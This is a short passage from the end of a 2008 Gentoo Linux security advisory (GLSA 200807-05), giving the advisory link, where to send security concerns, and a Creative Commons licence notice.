  http://security.gentoo.org/glsa/glsa-200807-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5